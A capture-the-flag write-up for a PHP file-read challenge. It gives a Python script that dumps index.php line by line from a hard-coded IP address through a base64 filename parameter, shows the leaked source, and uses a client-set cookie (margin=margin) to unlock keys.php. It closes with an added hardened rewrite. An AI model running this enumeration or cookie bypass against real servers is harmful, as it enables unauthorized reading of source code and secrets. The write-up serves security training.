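So can we read index.php through the filename parameter? Let's try: base64-encoding index.php gives aW5kZXgucGhw
Then request it. The line parameter is presumably the line number; a few quick tries confirm it.
Use a script to read out the source of index.php: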
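```python
import requests

# Read index.php one line at a time through the file-read endpoint.
# filename is base64("index.php"); line is the index of the line to return.
a = 30
for i in range(a):
    url = "http://123.206.87.240:8002/web11/index.php?line=" + str(i) + "&filename=aW5kZXgucGhw"
    s = requests.get(url)
    print(s.text)
```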
Source:
```php
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>
```
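The source shows that keys.php is only added to the allowed file list when the request carries the cookie margin=margin, so set that cookie and request keys.php (base64-encoded as before; not demonstrated again here).
Then right-click and view the page source to get the flag.
The Python script is taken from https://blog.csdn.net/qq_26090065/article/details/81588595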
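A hardened counterpart to the index.php source shown above, as an added example that is not part of the original challenge or write-up: the script no longer lists itself as readable, the client picks an opaque ID instead of a file name, and access to keys.php depends on server-side session state rather than a cookie the client can set. The `file` parameter, the `data` directory and the `is_admin` session key are assumptions made for this sketch (PHP 8).

```php
<?php
// Added example: hardened variant of the file-line viewer (not the challenge's code).
declare(strict_types=1);
session_start();

// Assumed layout: readable files live in ./data, separate from the script,
// so the viewer can never be pointed at its own source.
const BASE_DIR = __DIR__ . '/data';

// The client sends an opaque ID; file names exist only on the server side.
$public  = ['keys' => 'keys.txt'];
$private = ['flag' => 'keys.php'];

// Authorization comes from session state set at login (hypothetical
// 'is_admin' key), never from a value the browser supplies such as a cookie.
$allowed = $public;
if (($_SESSION['is_admin'] ?? false) === true) {
    $allowed += $private;
}

$id = $_GET['file'] ?? 'keys';
// Reject arrays (?file[]=x) and unknown IDs with an exact key lookup,
// instead of a loose in_array() comparison on a decoded file name.
if (!is_string($id) || !array_key_exists($id, $allowed)) {
    http_response_code(404);
    exit;
}

// Validate the line number as a non-negative integer; default to 0 if absent.
$line = filter_input(INPUT_GET, 'line', FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 0]]);
if ($line === null) {
    $line = 0;
} elseif ($line === false) {
    http_response_code(400);
    exit;
}

$rows = file(BASE_DIR . '/' . $allowed[$id], FILE_IGNORE_NEW_LINES);
if ($rows === false || !isset($rows[$line])) {
    http_response_code(404);
    exit;
}

// Send as plain text so file contents are never interpreted as HTML.
header('Content-Type: text/plain; charset=utf-8');
echo $rows[$line];
```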